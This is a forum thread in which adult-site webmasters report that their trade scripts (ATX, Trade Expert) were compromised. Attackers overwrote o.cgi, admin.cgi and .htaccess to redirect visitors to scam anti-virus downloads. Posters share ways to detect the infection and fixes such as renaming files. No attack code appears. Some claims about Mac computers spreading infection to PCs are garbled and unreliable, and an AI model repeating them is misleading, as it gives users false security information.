I just got hit again, and it seems I'm not the only one. Check your sites!!

Open IE8 (you must use IE) to about:blank and clear your history / cache.

Go to your page. If you've been infected, the second hit out through your trade script will go to some scam anti-virus download page.

To be extra sure, after clearing your cache, load your page by clicking on someone else's site, rather than typing it in or using a bookmark. Load another TGP that has you in the toplist, and then click to your site.

This affects sites using both ATX and Trade Expert (possibly TP too, but not sure). They are overwritting the o.cgi file to steal your traffic, and admin.cgi so they can edit the file integrity tool to cover their tracks.

these fuckers are getting smarter and smarter man

well easy fix..
Companies need to tell you how to change the name of those two file sand not have it kill the software..

Then it will be harder to have people target the sites..

I do this for all my Joomla sites.

Or better yet they could just setup a file that you name..
This file is then controlled by a simple admin on setup of site of update.
Letting you change a number of possible file names that will have week security setting due to rw- rules.

i don't know if it is the same thing


img693.imageshack.us/img693/3323/tgpx.jpg

Yeah, I got hit too, and I didn't fix it in time... Now I'm losing thousands of hits everyday due to Google's "This site may harm your computer."

Who are you hosting with?

yep i got nailed in the nuts on this too. If you got hit PM me and i will send you what i did. Its my best attempt at fixing it. If they still get in and change the outs then they have shell access and then you need to flush the OS

lets add a new twist to this shit. Now i got partner submitted galleries that are hacked lol.

1. restart your modem (you need a fresh ip if you are static ip its going to be hard to catch)
2. go to http://www.ultra-pornstars.com
3. go to the bottom to the toplist and click my site famouspornstars.com
4. go to the very bottom of my site. and you will see test1. It is a straight link to the gallery and not threw any script. And boom 1st click i get popped.

and the plot thickens....

and confirmed it is diffently the submitted gallery. had my firend add a link from his tgp (his on a windows box) and it redirects for him as well.

hey famous let me know if that modwrite fix works for you..
if not go with that other fix we talked about.

if possible you may want to leave out.php or o.cgi file around but clear it out..

So a ping to the file is still there and the hackers to start doing bot scans for the new files names.. it will just add 1 more step.. and edit the file name monthly or daily..

If daily and us use modrewrite to direct to correct file name then you can wrote a small script that will rename the file daily..

I get popped both when leaving UP (or entering FP not sure)
http://www.streamate.com/cam/Tammy_Moore/?...HNSMTY=303&lp=1

and when clicking the test link (livejazmin.com)

and that's on firefox too

yeah the livejzsmin is a popunder i sell and the streammate is on that dready sells. the bad one is when you click that link at the bottom and it tried to install shit on your pc

I got both popunders, but nothing tried to install. I'm on a Mac, so it wouldn't actually install but it would have downloaded something that would end up being harmless on my computer. But no downloads...

yeah mines cleaned off. go to the very very very bottom of the page and thier as test1 link that goes to a submitters galelry that was infected

nolonger see the test link so I could not see whats going on



Wont hurt your mac but will tunnel to any PC on your network or can still self attach in emails and other files a pc may touch..

So you are an un infected carrier, and PC is infected.. mac long ago removed the ability to remove viruses that could infect PC's on a MAC/PC environment...

its clean now i restated it this moring. They got into his server and edited the htaccess files.

oh great...
well atleast they left the sites live and didnt look you out.

Or turn it into a rickroll..